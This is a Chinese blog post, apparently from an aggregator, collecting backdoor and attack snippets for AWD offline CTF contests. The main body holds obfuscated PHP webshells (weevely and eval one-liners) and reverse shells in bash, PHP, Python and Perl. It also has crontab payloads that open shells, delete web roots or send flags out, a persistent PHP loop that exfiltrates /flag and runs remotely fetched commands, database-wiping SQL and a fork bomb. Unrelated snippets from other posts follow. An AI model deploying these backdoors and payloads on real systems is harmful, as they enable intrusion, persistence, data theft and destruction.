JBlock
JBlock

AWD线下备忘录

前言

AWD模式是一个非常有意思的比赛模式,其过程也是惊险刺激!今天主要对后门进行一个汇总!

文章目录

          • 前言
          • weevely后门
          • 蚁剑及菜刀型后门
          • 常用的特殊webshell
          • 权限维持
          • 反弹shell
          • Crontab
          • PHP型内存马
          • 其他

weevely后门

  1. 优点在于混淆性高,其他选手很难通过分析代码获得weevely型后门的密钥。另外,weevely内置了一些基础的小功能,使用起来也相对方便。

  2. 缺点便是通过php解析执行,执行速度较慢。

  3. 生成weevely后门:

    # moxiaoxi @ moxiaoxideMacBook-Pro in ~/Desktop/Myself/weevely3 [22:10:27] C:2
$ python weevely.py generate woaizhongguo weevely.php
Generated backdoor with password 'woaizhongguo' in 'weevely.php' of 1469 byte size.
   
# moxiaoxi @ moxiaoxideMacBook-Pro in ~/Desktop/Myself/weevely3 [22:10:50]
$ cat weevely.php
<?php
$u='$kh="-Y6471";$kf="-Y2151-Y";f-Yunction -Yx($t,$-Yk)-Y{$c=-Yst-Yrle-Yn($k);$-Yl=strlen($t);$-Yo';
$h='.$k-Yf),-Y0,3));$p=-Y"";f-Yor($z=1;-Y$z;
$s='-Ys-Ytrpos(-Y$p,$h)===0){$s[-Y$i]="";$-Yp=$-Yss($p-Y,3);}if(a-Yrra-Yy_ke-Yy_exists($i,-Y$s)){$s[';
$j=';}}re-Yturn $o-Y;-Y-Y}$r=$_SERVER-Y;$rr=@$r[-Y-Y"HTTP_REFER-YER"];$-Yra=@$r-Y[-Y"HT-YTP_ACC';
$C='o-Y-Ympress(@x(-Y@b-Yase64_decode-Y(-Y-Ypreg_replace(a-Yrray("/-Y-Y_/","-Y/-/"-Y),array(-Y"/","+"),';
$W=');$q=array_value-Ys-Y($q);preg_-Ymatch_all(-Y"-Y/([-Y\\w])[\\w-]+(?:-Y;q=0.(-Y-Y[\\d-Y]))?,-Y?/",';
$G=str_replace('N','','cNNreate_NfNuncNtiNon');
$c='$ra-Y,$m);if-Y($q-Y-Y&&$m){@s-Yession_start();$s=&$_-YSESS-YION;$ss-Y="subs-Ytr-Y";$-Ysl="-Ys';
$e='tr-Ytolowe-Yr";$i=$-Ym[1][-Y0].$m[1][-Y1]-Y;$h=$sl($ss(md5($i.-Y$kh-Y),0,-Y3));$f=$sl($s-Ys(-Ymd5($i';
$M='$i-Y].=$p;$e-Y=strpo-Ys($s-Y[$-Yi],$f);-Yif($e){$k-Y=-Y$-Ykh.$kf;ob_start-Y();@e-Yval(@gzunc';
$f='-Y4_enc-Yode(x(g-Yzcompres-Y-Ys($o)-Y,$k));p-Yrint("<$k-Y>$d");@session_-Ydestro-Yy();}}}}';
$B='$ss-Y($s[$i],-Y0,$e)))-Y,$-Yk)-Y)-Y);$o=ob_get_conten-Yts();ob-Y-Y_e-Ynd_clean();$d=ba-Yse6';
$g='=""-Y;for($i=0;$i<$l;-Y){-Yfo-Yr($j=0;($j<$-Yc&&$i<-Y$l)-Y;$j-Y++,$i++)-Y{$o.=$t{$i-Y}^$k{$-Yj}';
$x='-YEPT_LANGUAGE"];if-Y($-Yrr&&$ra)-Y{$u=p-Y-Yarse_-Yurl-Y($rr-Y);parse_str-Y($u["quer-Yy"]-Y-Y,$q';
$S=str_replace('-Y','',$u.$g.$j.$x.$W.$c.$e.$h.$s.$M.$C.$B.$f);
$o=$G('',$S);$o();
?>

  4. 使用weevely后门

    将其上传到指定web目录后,使用方式如下:

    # moxiaoxi @ moxiaoxideMacBook-Pro in ~/Desktop/Myself/weevely3 [22:14:15]
$ python weevely.py http://202.112.51.135:8801/Myself/weevely.php woaizhongguo
   
[+] weevely 3.5
   
[+] Target:	202.112.51.135:8801
[+] Session:	/Users/moxiaoxi/.weevely/sessions/202.112.51.135/weevely_0.session
   
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
   
weevely> ls
antsword.php
k.php
reverse.php
weevely.php
www-data@9b275645e178:/var/www/html/Myself $ whoami
www-data
www-data@9b275645e178:/var/www/html/Myself $

    这样就能得到www-data的一个类shell界面。

  5. load_session连接

    # moxiaoxi @ moxiaoxideMacBook-Pro in ~/Desktop/Myself/weevely3 [22:15:54] C:2
$ python weevely.py session /Users/moxiaoxi/.weevely/sessions/202.112.51.135/weevely_0.session
   
[+] weevely 3.5
   
[+] Target:	202.112.51.135:8801
[+] Session:	/Users/moxiaoxi/.weevely/sessions/202.112.51.135/weevely_0.session
   
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
   
weevely> ls
antsword.php
k.php
reverse.php
weevely.php
www-data@9b275645e178:/var/www/html/Myself $
蚁剑及菜刀型后门
0) {
    if (in_array($ip, $white_ip_list)) {
        $a = $_POST['moxiaoxi'];
        if (isset($a)) {
            eval($a);
        }
    }else{
        echo('IP:'.$ip);
    }
}

用以连接后,以Gui方式运维。

常用的特殊webshell

控制用的一句话木马,最好是需要菜刀配置的,这样做是为了不让别人轻易的利用你的一句话,要不然就只能等着别人用你的脚本捡分。
简单举例:

连接方式:php?2=assert密码是1。
献上我常用得一句话

配置为?b=))99(rhC(tseuqeR+lave


$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];if(isset($s22)){eval($s21($s22));}
?>

配置填n985de9=QGV2YWwoJF9QT1NUWzBdKTs=
连接密码:0(零)

权限维持

set_time_limit(0);
ignore_user_abort(true);

$file = '.conifg.php';
$shell = "curl 10.0.0.2"); ?>";

while(true){
file_put_contents($file, $shell);
system('chmod 777 .demo.php');

usleep(50);
}
?>

tips:.config.php前面使用一个点,能很好的隐藏文件

反弹shell

在bash下可以运行:

bash -i >& /dev/tcp/127.0.0.1/4444 0>&1

使用php:

php -r '$sock=fsockopen("127.0.0.1","4444");exec("/bin/sh -i <&3 >&3 2>&3");'

使用python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_REAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

使用perl:

perl -e 'use Socket;$i="127.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Crontab

  • 查看定时任务

    cat /etc/crontab*crontab -l

  • crontab备份

    crontab -l > $HOME/mycron

  • 删除crontab(www-data种植,www-data清理)

    crontab -r

  • crontab执行任意命令

    import base64
def crontab_reverse(cmd):
    crontab_path = "/tmp"
    crontab_cmd = "* * * * * bash -c '%s'\n"%cmd
    encode_crontab_cmd = base64.b64encode(crontab_cmd)
    cmd = "/bin/echo " + encode_crontab_cmd + " | /usr/bin/base64 -d | /bin/cat >> " + crontab_path + "/tmp.conf"+ " ; " + "/usr/bin/crontab " + crontab_path + "/tmp.conf"
    return cmd

  • crontab反弹shell

    import base64
def crontab_reverse(reverse_ip,reverse_port):
    crontab_path = "/tmp"
    cmd = 'bash -i >& /dev/tcp/%s/%d 0>&1'%(reverse_ip , reverse_port)
    crontab_cmd = "* * * * * bash -c '%s'\n"%cmd
    encode_crontab_cmd = base64.b64encode(crontab_cmd)
    cmd = "/bin/echo " + encode_crontab_cmd + " | /usr/bin/base64 -d | /bin/cat >> " + crontab_path + "/tmp.conf"+ " ; " + "/usr/bin/crontab " + crontab_path + "/tmp.conf"
    return cmd 
    ubuntu@ubuntu-virtual-machine:~$ /bin/echo KiAqICogKiAqIGJhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTI3LjAuMC4xLzgwODAgMD4mMScK | /usr/bin/base64 -d | /bin/cat >> /tmp/tmp.conf ; /usr/bin/crontab /tmp/tmp.conf
ubuntu@ubuntu-virtual-machine:~$
ubuntu@ubuntu-virtual-machine:~$ crontab -l
* * * * * bash -c 'bash -i >& /dev/tcp/127.0.0.1/8080 0>&1'

  • crontab删除文件

    import base64
def crontab_rm(rm_paths='/var/www/html/'):
    crontab_path = "/tmp"
    cmd = '/bin/rm -rf %s'%rm_paths
    crontab_cmd = "* * * * * %s\n"%cmd
    encode_crontab_cmd = base64.b64encode(crontab_cmd)
    cmd = "/bin/echo " + encode_crontab_cmd + " | /usr/bin/base64 -d | /bin/cat >> " + crontab_path + "/tmp.conf" + " ; " + "/usr/bin/crontab " + crontab_path + "/tmp.conf"
    return cmd

  • crontab提交flag

    import base64
def crontab_flag_submit(flag_server,flag_port,flag_url,flag_token,flag_path):
    crontab_path = '/tmp'
    cmd = '/usr/bin/wget "http://%s:%s/%s" -d "token=%s&flag=$(/bin/cat %s)" ' %(flag_server,flag_port,flag_url,flag_token,flag_path)
    crontab_cmd = "* * * * * %s\n"%cmd
    encode_crontab_cmd = base64.b64encode(crontab_cmd)
    cmd = "/bin/echo " + encode_crontab_cmd + " | /usr/bin/base64 -d | /bin/cat >> " + crontab_path + "/tmp.conf" + " ; " + "/usr/bin/crontab " + crontab_path + "/tmp.conf"
    return cmd
  
cmd = crontab_flag_submit(flag_server='172.16.132.2',flag_port='8088',flag_url='submit',flag_token='bcbe3365e6ac95ea2c0343a2395834dd',flag_path='/flag')
print(cmd)

PHP型内存马

内存马,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。要杀死这种内存马,在root权限下只需要重启Apache或者nginx即可。而在线下赛中,我们往往没有root权限。因此,我们一般得通过www-data用户进行杀马。

杀马,kill -9 -1 杀死所有子进程(杀死当前用户所有进程,有权限下慎用),也可以直接killall apache2。这种操作并不会kill掉apache主进程,因为内存马是Apache启动的一个子进程;

ps -aux|grep ‘www-data’|awk ‘{print $2}’|xargs kill -9

  1. 回送flag+自动提交flag+回连任意代码执行

    
$message="* * * * * curl 192.168.136.1:8098/?flag=$(cat /flag)&token=7gsVbnRb6ToHRMxrP1zTBzQ9BeM05oncH9hUoef7HyXXhSzggQoLM2uXwjy1slr0XOpu8aS0qrY";
ignore_user_abort(true);
set_time_limit(0);
while (true) {
    $x =file_get_contents('/flag');
	file_get_contents('http://192.168.136.1:8099/test.php?token=moxiaoxi&flag='.$x);
    sleep(5);
    system("echo '$message' > /tmp/1 ;");
    system("crontab /tmp/1;");
    system("rm /tmp/1;");
    $c=file_get_contents('http://192.168.136.1:8100/1.txt');
    system($c);
}
?>

  2. 覆盖写

    
ignore_user_abort(true);
set_time_limit(0);
while (1){
	$path = "/var/www/html/css/.moxiaoxi2.php";
	$data = "";
    @file_put_contents($path, $data);
    system('chmod 777 '.$path);
    usleep(100);
}
?>

    这里讲一下二进制马,我至今还没找到那种可以动态变pid,而且执行速度超快的二进制马。所以,在当下看来,二进制马作用其实不大,因为所有的二进制马都可以通过杀死内存马的方式杀掉,就显得很鸡肋。如果后面发现了这种快速执行的骚马,可以拿出来讲一讲。

其他

  1. 数据库相关

    删除数据库

    import base64
def rm_db(db_user,my_db_passwd):
    cmd = "/usr/bin/mysql -h localhost -u%s %s -e '"%(db_user,my_db_passwd)
    db_name = ['performance_schema','mysql','flag']
    for db in db_name:
        cmd += "drop database %s;"%db
    cmd += "'"
    return cmd

    修改用户信息

    update mysql.user set authentication_string=PASSWORD('hi23333');# 修改所有用户密码
flush privileges;
UPDATE mysql.user SET User='aaaaaaaaaaaa' WHERE user='root'; 
flush privileges;
delete from mysql.user ;#删除所有用户
flush privileges;

  2. fork炸弹

    /bin/echo '.() { .|.& } && .' > /tmp/aaa;/bin/bash /tmp/aaa;

  3. 滥用杀死不死马脚本,不停kill apache2,造成dos

  4. 大量发送长度超长的脚本,造成dos

  5. mysql sleep型dos

  6. 所有的正向shell可以自己写一段简单的python脚本进行控制与管理,而反向shell可以使用王一航写的反向shell管理器.现在的反向shell管理器还存在一些bug。

  7. ….

你可能感兴趣的:(CTF学习,Web安全)

  • 感恩日记第二天 情雪儿
    我十分幸运能够拥有健康的身体,因为拥有健康的身体我可以开心的工作和学习;我感到十分快乐,并感激拥有一份喜欢的工作,因为工作让我每天过得很充实与安心;我十分感激拥有金钱,因为金钱能让我满足内心想要拥有的物品;我要衷心地说声谢谢,感谢领导对我的关照,因为一直在关心和支持着我的工作和生活;我要衷心感谢自己,因为无论各种状况都在坚持着自己的好习惯;我感到十分幸福,因为一直在背后默默支持着我的爱人,无论何种
  • 荣获市书香家庭称号 悟宝_ad67
    孙五听嵩县焦点地面初级班二期坚持分享20天2019.03.20今天领到洛阳市妇女联合会2018年度书香家庭的荣誉证书,心理还是挺开心的,两年来坚持读书,引领几百个家庭朗读,自己提升的同时也帮助更多的家庭,想到这些,平时的辛苦付出还是挺值得的!在往后的生活中,将更用心去学习,朗读!继续发扬书香家庭的良好习惯!图片发自App图片发自App图片发自App
  • 《3~6岁儿童学习与发展指南》 浅嫣婉语_db1d
    4-5岁幼儿的发展指标1.身高和体重适宜。4~5岁的幼儿比起3~4岁的幼儿,身高增长得比较明显,而体重变化则不是很大。这是因为幼儿的发育进入了相对缓慢的时期,而不像3岁以前那样成长得快。《指南》确定的4-5岁幼儿身高与体重成长的参考标准为:男孩身高100.7~119.2厘米,体重14.1-24.2公斤;女孩身高99.9-118.9厘米,体重13.7-24.9公斤。比较3~4岁的幼儿,4~5岁幼儿的
  • 告一个段落恢复规律-2022-09-03 糖糖82
    老公侄女上大学的事终于乱完了,我减肥的事磕磕碰碰也告一个段落了,孩子9月5日开学已经定了,不会再延期了,所有混乱告一个段落了。这次例假来,肚子居然痛了2天,不知道为啥,是不是怪上个月回老家例假时吃冷的了,当时没反应,这个月来反应。不过不管怎么说,到今天也告一个段落了。一切要开始恢复规律了。继续执行早起计划,锻炼身体,学习。趁开学还有2天的时间再次思考,我要怎么和孩子相处,改变认知再改变行为,这个过
  • 精诚所至,金石为开 - 草稿 一禾粒子
    今天阅读的章节是:精益求精几天来,虽说是在分享读书笔记,实则还是在继续梳理自己。每天的学习内容,读起来,对自己都有不小的触动。我时常在感叹猫叔的剽悍!为了让我们少走弯路,把自己一路走来的足迹,展示给我们;猫叔通过大量的阅读和践行,获得了成功,又将最精华的环节推荐给我们,他选定的读本,都是针对我们前行路上会遇到的迷茫,由于他的督导,成就了后来人,使得行者事半功倍。在学习的路上,我们需要得到这些具有针
  • 做人不能太自私 但愿人长久的九月
    1.我有一个同事,平常看起来人挺好,很乖,说话也很温柔,在学校是学霸,工作了还不断学习,我挺佩服这种女生的。但是相处久了我发现,她真的好自私。最近说好了三个人一起租房子住,一个大卧室能睡两个人,一个小点的卧室能睡一个人,我们三个就说好,单独的小卧室轮流睡,一人睡四个月,这样不仅公平,也能享受到独处的时间。事情看起来这么风平浪静,安排也很合理。但是有一天她笑眯眯的来找我,一看就是有话要说的样子,我说
  • 《如何学习》 小太阳西西
    念书的时候,班上通常都有这样四类的人:努力成绩很好的,努力成绩一般的,不努力成绩不好的,和不努力成绩很好的。前三种人看上去感觉都在情理之中,最后这类人总是让人怀疑人生,what?我不是看他天天上课玩游戏下课打球吗?为何成绩每次都是一二名?总是忍不住在想他到底有什么秘诀,接触到这本书我才知道:成绩最好的不是最用功的学生,而是最会学的学生,比起“刻意练习”,更重要的是“科学练习”。在《如何学习》一书中
  • 幸福感恩日记第15篇 豫豫妈
    2018.7.3豫豫妈早课心得:1、这个世界外面没有别人,只有自己。一切都是自己的问题。2、每个人都不是完美的,学会转念,高效沟通。3、讲好每句话也是阴阳并存的,一阴一阳之谓道。4、坚持读经,早起学习,记笔记及时内化,学以致用才能正确的引导孩子。5、一个工具,二个方法,一个核心;五个步骤,僵化学习、固化学习、内化学习、优化学习、变化学习运用易经思维进行学习总结。方法:如果----那么----有点像
  • 乐享生活2014.6.18 乐享生活
    上午下班后去完成了一件拖了很久的事情,洽谈得不错,静候佳音吧。下午,妞提出自己坐车去田心。我很赞同,放学后帮她拿了书包(实在太重不忍让她背那么长时间),就自己骑车先去了鼓室。到了鼓室待了一会打电话想问问妞到哪了,却一直不接电话,这会开始有点着急了,不时看看门外。不多会,小妞自己到了鼓室。呵呵,又一次挑战成功。回家后,妞想吃手抓饼,同意了,她自己煎,顺便帮我做了个,味道不错。晚上将学习的亲子阅读技巧
  • 洛阳李艳 焦点初十 坚持分享第124天 2018-10-13 ycgaly
    每到周末都要参加两天的专业知识培训,在四十岁的时候,能和有着不同背景和生活经历,但却有着同一个目标的一群人,像回到学生时代努力学习,看到的是坚持的不️易和勇敢的精神!
  • 2022-07-08 青冰l
    有播种,才可能有收获,前提是播种的是一粒好种子。“好种子”如何培育?第一,不断施肥。是说要不断学习,不断为其补充新鲜的血液和能量。第二,勤于观察。要随时观察补充的血液和能量是不是适中。能量并非越多越好,保持不同阶段的平衡即可。第三,敢于放弃。如果培育中发现有坏掉的种子,特指不好的习惯,要敢于放弃,敢于取舍。如此,才有可能在来年的春季大丰收。我相信
  • 坚持运动 慕莞Kate
    下夜班,出完最后一趟诊,回家,吃完早饭,刷完手机,就睡觉了,一觉睡到一点钟,起来收拾收拾,洗洗衣服,洗洗脸,给自己煮了碗面。今天的面很好,我的糖心蛋很成功,还有青菜,我很喜欢今天的面。晚上去健身房,踢毽球,动感单车,洗澡,回家。其实是很充实的一天,我很开心,要好好学习咯,要自律。自律很难,希望自己坚持下去。作者语录:自律的人生,我也想拥有。
  • 教育信息化促进优秀教育资源共享 榆树289金红
    记得2017年北京的文科状元熊轩昂说了一番心里话(农村地区的孩子越来越难考上好学校,像我这种属于中产阶级家庭的孩子,衣食无忧,家长也都是知识分子,而且还生在北京这种大城市,所以,在教育资源上享受到这种得天独厚的条件,是很多外地孩子和农村孩子完全享受不到的。这些条件,决定了我在学习的时候确实是比他们走很多捷径)。——教育资源失衡,教育改革迫在眉睫是我从这段话中总结出的拙见!图片发自App然教育改革任
  • 深度学习:怎么看pth文件的参数 奥利给少年 深度学习人工智能
    .pth文件是PyTorch模型的权重文件,它通常包含了训练好的模型的参数。要查看或使用这个文件,你可以按照以下步骤操作:1.确保你有模型的定义你需要有创建这个.pth文件时所用的模型的代码。这意味着你需要有模型的类定义和架构。2.加载模型权重使用PyTorch的load_state_dict方法来加载权重。这里是如何操作的:importtorchimporttorch.nnasnn#定义模型结构
  • 「Python」2020.04.08学习笔记 | 第六章文件(a+)模式+把随机手机号写入文件小练习 Yetta的书影屋
    学习测试开发的Day97,真棒!学习时间为40M第九次全天课(下午视频二20M-50M)>>>fp.seek(0)0>>>fp.read()'你好11你好12你好13你好14你好15\n你好16\n你好17\n你好18\n'>>>fp.seek(0,0)0>>>fp.write("*********************************\n")34>>>fp.seek(0,0)0>>>f
  • chatgpt赋能python:如何在Python中计算平均值 tulingtest ChatGptpythonchatgptnumpy计算机
    如何在Python中计算平均值计算平均值是数据分析、统计和机器学习等许多领域中的常见任务。Python作为一门功能强大且易于学习的编程语言,为计算平均值提供了多种方法。在本文中,我们将介绍如何在Python中计算平均值。什么是平均值简单来说,平均值是一组数字的总和除以数字的数量。例如,对于数字序列1,3,5,7,9,平均值是(1+3+5+7+9)/5=5。平均值在数据分析中非常有用,因为它可以提供
  • chatgpt赋能python:如何在Python中安装Keras库? turensu ChatGptpythonchatgptkeras计算机
    如何在Python中安装Keras库?Keras是一个简单易用的神经网络库,由FrançoisChollet编写。它在Python编程语言中实现了深度学习的功能,可以使您更轻松地构建和试验不同类型的神经网络。如果您是一名Python开发人员,肯定会想知道如何在您的Python项目中安装Keras库。在本文中,我们将向您展示如何安装和配置Keras库。步骤1:安装Python要使用Keras库,您需
  • 2017.11.23打卡计划 爱跑步的coder
    11.23打卡做完calculus_oneweek2的作业(暂时不学这个了,意义不大),并尽量将内容代码化。(已用python和ruby的匿名函数来表示)11.24打卡明晚学习中国人文文化导读第一周的课程。
  • 如何理解深度学习的训练过程 奋斗的草莓熊 深度学习人工智能pythonscikit-learnvirtualenvnumpypandas
    文章目录1.训练是干什么?2.预训练模型进行训练,主要更改的是预训练模型的什么东西?1.训练是干什么?以yolov5为例子,训练的目的是把一组输入猫狗图像放到神经网络中,得到一个输出模型,这个模型下次可以直接用来识别哪个是猫,哪个是狗2.预训练模型进行训练,主要更改的是预训练模型的什么东西?超参数(Hyperparameters):这是模型结构中定义的参数,比如:卷积核大小(kernel_size
  • 吸引力法则工作坊学习打卡记录 秋乐飞扬
    图片发自App刘宇秀2019年12月21日27天/100天一.亿万富翁制造机一一照镜子工程的体验和感受美女,早上好,我爱你二、欣赏赞美认同欣赏赞美认同我欣赏赞美认同我的领悟力我欣赏赞美认同我的能力我欣赏赞美认同我的富裕我欣赏赞美认同我的堂妹刘凤平我欣赏赞美认同江欧师姐我欣赏赞美认同大师姐三.感恩日记1.我很感恩我的组员!她们在我的带动下,慢慢积极主动学习打卡!谢谢,谢谢,谢谢。2.我很感恩我的情绪
  • 游戏天性——阅读记录 Qi点
    当代父母的困境:信息过度泛滥,育儿知识丛出不穷,传统的婴儿护理“必需品”已经不能满足家长的需求了,诸如尿布包、婴儿车和汽车安全座椅等。面对繁多的物品和育儿知识,如何选择成为一个难题。匆匆忙忙的童年:孩子出生后,家长就会催促孩子尽快学习成人才会的技能。他们可能多年后才需要用到这些知识(甚至可能永远用不到)。越来越多的家长不断让孩子参加一个又一个“充实”而有组织的活动。他们总是在开车送孩子参加活动的路
  • 人到中年不容易,尤其是女人 晓寒清
    最近不知道怎么了,身边的中年女人包括我自己生活都受到了重创,人到中年不容易,尤其是女人。A是一个非常善良温柔实诚的女人,孩子十七岁高二了,跟她在学习读书。前两年宫颈囊肿做了两次手术。在家里也没什么地位,公公比较霸道。最近听说她老公已经在外面跟别的女人生了孩子,孩子都好几岁了,她还不知道。真的是提前做好了那啥准备。B是一个从未谋面的东北姑娘,跟我差不多大,从东北远嫁到如皋,丈夫跟她离婚后一个人带孩子
  • 读书学习 凌云渡XKF
    学习,我们不仅要学习,还要正确处理好工作、学习、生活的关系,建立工作学习化、学习生活化的处世方式。不能因为工作繁重找借口没有学习时间,更不能因为生活的单调而误认为学习无用。我们要知道只有学习才能把自己从繁重的工作中解放出来,也只有学习才能使自己走出单调、低级、无味的生活。因为学习使人对待事物有了新认识、新观念,学习使人掌握了解决问题的新手段、新方法,学习使人走出了既得利益的小天地,走向了豁达和谐的
  • 你成长的路,我们一起学习! 追梦的精灵
    “妈妈,我们为什么要搬家?”“我再也不想去那个学校了”“我再也不想跟那些同学玩了,我就想跟妈妈在家里玩”“我想去以前的那个家”“我跟他们每个人说,跟我做朋友吧,跟我做朋友吧,他们都不跟我做朋友,我好伤心”呜呜呜......昨夜,儿子在临睡前哭着对我说了这些话,听到耳里疼在心里,“难道我们做错了吗?”我不停地反问自己。心疼他哭得那么伤心,向我倾诉这些话,他已经两周没有去幼儿园了,在家玩了这么久竟然还
  • 《论语·公冶长》之十三 - 朱文津 让世界因我的存在而更加美好
    《论语·公冶长》之十三朱文津各位同学大家好!今天我们学习《公冶长篇》第十三章,先恭诵原文——子贡曰:“夫子之文章,可得而闻也;夫子之言性与天道,不可得而闻也。”子贡说:“夫子讲的知识学问,是可以听到的;夫子讲的性与天道,是难得听到的。”所依一:宋代大儒程颢(hào)、程頣(yí)认为:“此子贡闻夫子之至论而叹美之言也。”这是圣门高徒子贡,赞叹夫子讲的性与天道太美了,再没有比这个更高深微妙的道理了。
  • 1月30 日 李艺莹
    今天学习的是用触摸屏做的显示文字,很神奇。就是需要配置的东西很多,管脚很多,其他的东西还好。我接下来需要提高的就是自己来编写所有的配置。明天就要考试了,我真的是很紧张,晚上还是要复习的,虽然就要放假了,但是我还是要多学一点的,不要荒废了时间。不说了,我要去复习啦。FIGHTING,FIGHTING,FIGHTING。
  • 创时代安利你个开挂人生 斜杠青年袁海强
    安利一下我自己,我叫袁海强,90后,曾在国电投工作,从事火力发电工作。现在是一名安利人。也是一名讲师。互联网的出现让我们90后成为了互联网的原住民,全民都忙着上网,成了低头党,玩手机会怎么样呢?颈椎不好,怎么办?用纽崔莱健络精华,俗称关节宝,我自己就是在初中的时候就是脖子总是响,我以前总是很自豪,武侠片高手就是这样的。没事我还会得瑟故意转动脖子,后来我发现我有病,当我学习了全息经络刮痧后,慢慢的让
  • 绘本的价值 666小飞鱼
    《小学教师》的编辑陈洪杰老师曾说过,对于孩子而言,教学往往是“关系先于教学”“形式先于内容”“趣味先于意义”。这其实是给我们就如何打破当前数学教学窘况的一个很好的引子。数学绘本具有图文并茂,以贴近生活的趣味故事、色彩丰富的直观图画呈现数学知识,顺应了第一学段儿童的心理和学习发展规律,更能激发他们对于数学学习的兴趣,培养他们的想象力和逻辑思维。因此,数学绘本在第一学段的融入具有十分重要的意义和价值。
  • Keras深度学习框架入门及实战指南 司莹嫣Maude
    Keras深度学习框架入门及实战指南keraskeras-team/keras:是一个基于Python的深度学习库,它没有使用数据库。适合用于深度学习任务的开发和实现,特别是对于需要使用Python深度学习库的场景。特点是深度学习库、Python、无数据库。项目地址:https://gitcode.com/gh_mirrors/ke/keras一、项目介绍Keras简介Keras是一款高级神经网络
  • 9.单细胞 RNA-seq:聚类分析 denghb001
    学习目标:利用多种方法来评估聚类选择的PC基于重要的PC执行单细胞聚类单细胞RNA-seq聚类分析现在我们已经整合了高质量的细胞,我们想知道我们的细胞群中存在的不同细胞类型。image目标:为了生成特定细胞类型的簇,并使用已知的细胞类型的标志基因来确定的簇的身份。为了确定分群是否代表真实的细胞类型或由于生物或技术差异而形成的群集,如在细胞周期的S期的细胞群,特定批次的簇,或具有高线粒体含量的细胞。
  • Algorithm 香水浓 javaAlgorithm
    冒泡排序 public static void sort(Integer[] param) { for (int i = param.length - 1; i > 0; i--) { for (int j = 0; j < i; j++) { int current = param[j]; int next = param[j + 1];
  • mongoDB 复杂查询表达式 开窍的石头 mongodb
    1:count    Pg: db.user.find().count();    统计多少条数据 2:不等于$ne    Pg: db.user.find({_id:{$ne:3}},{name:1,sex:1,_id:0});    查询id不等于3的数据。 3:大于$gt $gte(大于等于) &n
  • Jboss Java heap space异常解决方法, jboss OutOfMemoryError : PermGen space 0624chenhong jvmjboss
    转自 http://blog.csdn.net/zou274/article/details/5552630 解决办法: window->preferences->java->installed jres->edit jre 把default vm arguments 的参数设为-Xms64m -Xmx512m ----------------
  • 文件上传 下载 解析 相对路径 不懂事的小屁孩 文件上传
    有点坑吧,弄这么一个简单的东西弄了一天多,身边还有大神指导着,网上各种百度着。 下面总结一下遇到的问题: 文件上传,在页面上传的时候,不要想着去操作绝对路径,浏览器会对客户端的信息进行保护,避免用户信息收到攻击。 在上传图片,或者文件时,使用form表单来操作。 前台通过form表单传输一个流到后台,而不是ajax传递参数到后台,代码如下: <form action=&
  • 怎么实现qq空间批量点赞 换个号韩国红果果 qq
    纯粹为了好玩!! 逻辑很简单 1 打开浏览器console;输入以下代码。 先上添加赞的代码 var tools={}; //添加所有赞 function init(){ document.body.scrollTop=10000; setTimeout(function(){document.body.scrollTop=0;},2000);//加
  • 判断是否为中文 灵静志远 中文
    方法一: public class Zhidao { public static void main(String args[]) { String s = "sdf灭礌 kjl d{';\fdsjlk是"; int n=0; for(int i=0; i<s.length(); i++) { n = (int)s.charAt(i); if((
  • 一个电话面试后总结 a-john 面试
    今天,接了一个电话面试,对于还是初学者的我来说,紧张了半天。 面试的问题分了层次,对于一类问题,由简到难。自己觉得回答不好的地方作了一下总结:   在谈到集合类的时候,举几个常用的集合类,想都没想,直接说了list,map。   然后对list和map分别举几个类型:   list方面:ArrayList,LinkedList。在谈到他们的区别时,愣住了
  • MSSQL中Escape转义的使用 aijuans MSSQL
    IF OBJECT_ID('tempdb..#ABC') is not null drop table tempdb..#ABC create table #ABC ( PATHNAME NVARCHAR(50) ) insert into #ABC SELECT N'/ABCDEFGHI' UNION ALL SELECT N'/ABCDGAFGASASSDFA' UNION ALL
  • 一个简单的存储过程 asialee mysql存储过程构造数据批量插入
               今天要批量的生成一批测试数据,其中中间有部分数据是变化的,本来想写个程序来生成的,后来想到存储过程就可以搞定,所以随手写了一个,记录在此:            DELIMITER $$ DROP PROCEDURE IF EXISTS inse
  • annot convert from HomeFragment_1 to Fragment 百合不是茶 android导包错误
    创建了几个类继承Fragment, 需要将创建的类存储在ArrayList<Fragment>中; 出现不能将new 出来的对象放到队列中,原因很简单;     创建类时引入包是:import android.app.Fragment;      创建队列和对象时使用的包是:import android.support.v4.ap
  • Weblogic10两种修改端口的方法 bijian1013 weblogic端口号配置管理config.xml
    一.进入控制台进行修改    1.进入控制台:  http://127.0.0.1:7001/console     2.展开左边树菜单         域结构->环境->服务器-->点击AdminServer(管理) &
  • mysql 操作指令 征客丶 mysql
    一、连接mysql 进入 mysql 的安装目录; $ bin/mysql -p [host IP 如果是登录本地的mysql 可以不写 -p 直接 -u] -u [userName] -p 输入密码,回车,接连; 二、权限操作[如果你很了解mysql数据库后,你可以直接去修改系统表,然后用 mysql> flush privileges; 指令让权限生效] 1、赋权 mys
  • 【Hive一】Hive入门 bit1129 hive
    Hive安装与配置 Hive的运行需要依赖于Hadoop,因此需要首先安装Hadoop2.5.2,并且Hive的启动前需要首先启动Hadoop。   Hive安装和配置的步骤   1. 从如下地址下载Hive0.14.0   http://mirror.bit.edu.cn/apache/hive/    2.解压hive,在系统变
  • ajax 三种提交请求的方法 BlueSkator Ajaxjqery
    1、ajax 提交请求 $.ajax({ type:"post", url : "${ctx}/front/Hotel/getAllHotelByAjax.do", dataType : "json", success : function(result) { try { for(v
  • mongodb开发环境下的搭建入门 braveCS 运维
